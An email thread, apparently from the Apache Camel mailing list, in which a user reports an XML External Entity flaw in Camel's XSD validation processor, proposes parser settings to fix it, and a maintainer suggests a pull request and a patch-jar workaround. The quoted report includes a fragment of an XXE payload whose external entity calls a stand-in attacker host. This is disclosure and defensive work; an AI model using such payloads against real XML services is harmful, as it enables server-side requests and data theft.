Re: XML External Entity (XXE) - validator vulnerability ?
Normally we talk about this kind of issue on the private mailing list.
As you already provided a fix for it, you can send a PR with the fix as
the contribution document suggests. I'd be happy to apply it into
I'm not sure how you deployed the Camel application. Normally you can
create a patch jar which just has the fixed classes and put it as the first
element in the class path to override the old version of the Camel class.
Blog: http://willemjiang.blogspot.com (English)
On Sat, Apr 14, 2018 at 7:23 PM, Karel Jelínek <karel.jelinek@xxxxxxxxxxx>
> Dear All,
> we are using the XSD validation processor from the camel-core library.
> Our penetration tests found that the application can be attacked by "XML
> External Entity (XXE)" (https://www.owasp.org/index.p
> We think that the classes affected by this vulnerability are
> Method SchemaReader.createSchemaFactory should also set the property
>     factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
> Method ValidatingProcessor.doProcess should set the properties on the validator class:
>     Validator validator = schema.newValidator();
>     // prevent XXE attack
>     validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
>     validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
> If we try to validate the infected XML against the XSD, we can see that Camel is
> trying to access an external site (attackers.site) in this example:
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE root [
> <!ENTITY % remote SYSTEM "http://attackers.site:53/TEST">
> Disabling the mentioned properties should do the trick.
> I would like to ask you if this will be created as a security BUG in Camel
> and if it will be fixed in a future version?
> Can we use some workaround? Write our own custom implementation of
> ValidatingProcessor? Is it possible?
> Best regards
> Karel Jelínek
> Unicorn Systems